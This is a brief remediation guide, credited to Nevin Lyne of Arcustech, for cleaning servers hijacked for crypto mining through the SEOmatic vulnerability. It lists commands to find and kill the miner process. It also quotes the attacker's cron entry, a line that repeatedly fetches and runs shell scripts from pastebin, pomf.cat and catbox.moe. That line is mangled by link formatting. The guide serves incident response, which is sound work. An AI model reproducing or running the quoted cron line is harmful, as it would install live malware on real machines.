The following is an outline of the steps provided by Nevin Lyne from Arcustech to fix a server that's been compromised by the SEOmatic security vulnerability. These instructions are specific to servers that were hacked to be used for crypto currency mining. YMMV.
ps ax | grep watohdog
kill -9 [process id]
readlink -f /proc/[process_id]/exe
*/10 * * * * (curl -fsSL [<https://pastebin.com/raw/sRj0Lc8C||wget>](<https://pastebin.com/raw/sRj0Lc8C%7C%7Cwget>) -q -O[
https://pastebin.com/raw/sRj0Lc8C||curl](<https://pastebin.com/raw/sRj0Lc8C%7C%7Ccurl>) -fsSL [<https://a.pomf.cat/rxxypc.sh||wget>](<https://a.pomf.cat/rxxypc.sh%7C%7Cwget>) -q -O -[
https://a.pomf.cat/rxxypc.sh||curl](<https://a.pomf.cat/rxxypc.sh%7C%7Ccurl>) -fsSLk [<https://files.catbox.moe/6uvjoq.sh||wget>](<https://files.catbox.moe/6uvjoq.sh%7C%7Cwget>) -q -O
<aside> <img src="https://s3-us-west-2.amazonaws.com/secure.notion-static.com/dc581e24-09c7-48dc-a950-c71be3f97c45/warning.svg" alt="https://s3-us-west-2.amazonaws.com/secure.notion-static.com/dc581e24-09c7-48dc-a950-c71be3f97c45/warning.svg" width="40px" /> It's worth noting that, so far, all signs are pointing to these steps effectively scrubbing the server of any nastiness that was installed. But the only way to be absolutely sure the server is clean and that your data and users are safe is to start fresh with a new server or restoring from a full system snapshot taken before the exploit happened.